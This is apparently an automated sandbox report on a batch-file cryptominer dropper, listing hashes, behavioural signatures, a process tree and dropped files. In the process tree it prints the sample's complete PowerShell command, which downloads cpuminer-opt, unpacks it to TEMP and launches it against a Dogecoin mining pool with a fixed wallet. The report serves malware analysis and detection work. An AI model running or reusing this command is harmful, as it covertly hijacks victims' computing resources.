f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4

Analysis

max time kernel
1798s
max time network
1802s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
03/02/2024, 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

508B
MD5

d9af861fbfd5f212c2db65e7ed0cd376
SHA1

f9316adde0463e645cc0624f645faad3b972320a
SHA256

f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
SHA512

92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4228	powershell.exe
4	4228	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4280	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4280	cpuminer-sse2.exe
4280	cpuminer-sse2.exe
4280	cpuminer-sse2.exe
4280	cpuminer-sse2.exe
4280	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4488 wrote to memory of 4228	4488	cmd.exe	74
PID 4488 wrote to memory of 4228	4488	cmd.exe	74
PID 4228 wrote to memory of 3252	4228	powershell.exe	76
PID 4228 wrote to memory of 3252	4228	powershell.exe	76
PID 3252 wrote to memory of 4280	3252	cmd.exe	77
PID 3252 wrote to memory of 4280	3252	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4228
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3252
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4280

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyopq5xr.5e5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.2MB

MD5
b465230cf79fcd815a31dad053d1dbe1

SHA1
f1bf5606ba3d1bb49d9437b5ba489fd9e8614ace

SHA256
cd616032256b5c1fdad92cf551a04c9f8fb9292262b19af72c1d8406b8baf865

SHA512
b832fcdf586c0afad6f0fc7dd315ba3ae05d3e49ca730ddba0ac463620afd44215a3e2d3f906de41e4448dd91610b13633148048819156aa27a4ee3155d3e9bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.1MB

MD5
d6a2651ce86560ec77259efc3df246fa

SHA1
1e72d8e5049a66e1f257d00847fae193c2f8bb02

SHA256
1703f2c16ca81fd8d53d899d0c191db61af986281cdaf3939e9aafcb2aa377a6

SHA512
eece650394d481935c42793702efa7220ae51d92e50dde346b62026d1946418011f665dabe217b6e775b79d65b7580652299a816961a23880abff400ee14201b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
2.1MB

MD5
35d4a2b508189bf6d5a295abdaf4f4d3

SHA1
4b5d11edbec4f6f8a6a24e8ff490030cc7cdb642

SHA256
b711ee596f725d44e18faa98c84ca1a61b900b239f333fa20fb087b2e75df8c3

SHA512
8a92e0e830809e6e932ce2a314cf6b23ee14265c1b902204e84909b87232232a7a1f4120c1396029abeeaed88300e790bf7e73036fbb0d87d1a69e4fd4798087

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
4.2MB

MD5
aff0055164dab7d37064632c3c6cc649

SHA1
9bb5c7ddb0e101684cff40a63e0416a2b3565200

SHA256
93fa7b9b3862b92612530e3dddf0d898ccc9cb4881852653f14f739dcef7fec1

SHA512
e5c6b9d751da5e1e72935be4feaac2efa45d79f3f5379768d1d9d541b8cbd297a2c2458dcf0a8123ea90b9c6e18c3dbbf64766bc4da8d1e09f952cdbab141ec5

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
17.2MB

MD5
0e7357885c0f4de23e48a0dca68888ed

SHA1
d150cec03b6fa237821d7a89ea8234a99539d306

SHA256
3354dbdc185029afd2cf3e4731e86aa6ed3e0a8f504615433b8a575186a9b054

SHA512
23a3f9fc5f5945cc28375b38468dbc9b587aa76c4a315cc63285b4b5da1e53ac9603280b9d879345cbcea69b0338f2c66669f69c4773e9385c03de8a1aeaad9f

Download Submit
memory/4228-31-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-32-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-52-0x000002599F5F0000-0x000002599F602000-memory.dmp

Filesize
72KB

Download
memory/4228-65-0x000002599F450000-0x000002599F45A000-memory.dmp

Filesize
40KB

Download
memory/4228-4-0x000002599F400000-0x000002599F422000-memory.dmp

Filesize
136KB

Download
memory/4228-108-0x00007FFC72EB0000-0x00007FFC7389C000-memory.dmp

Filesize
9.9MB

Download
memory/4228-30-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-29-0x00007FFC72EB0000-0x00007FFC7389C000-memory.dmp

Filesize
9.9MB

Download
memory/4228-25-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-10-0x000002599F610000-0x000002599F686000-memory.dmp

Filesize
472KB

Download
memory/4228-7-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-6-0x000002599F480000-0x000002599F490000-memory.dmp

Filesize
64KB

Download
memory/4228-5-0x00007FFC72EB0000-0x00007FFC7389C000-memory.dmp

Filesize
9.9MB

Download
memory/4280-123-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4280-151-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-121-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-124-0x0000000073940000-0x00000000739D8000-memory.dmp

Filesize
608KB

Download
memory/4280-125-0x0000000000E50000-0x0000000002705000-memory.dmp

Filesize
24.7MB

Download
memory/4280-131-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-136-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-139-0x0000000073940000-0x00000000739D8000-memory.dmp

Filesize
608KB

Download
memory/4280-146-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-122-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4280-154-0x0000000073940000-0x00000000739D8000-memory.dmp

Filesize
608KB

Download
memory/4280-161-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-166-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-169-0x0000000073940000-0x00000000739D8000-memory.dmp

Filesize
608KB

Download
memory/4280-176-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-181-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4280-184-0x0000000073940000-0x00000000739D8000-memory.dmp

Filesize
608KB

Download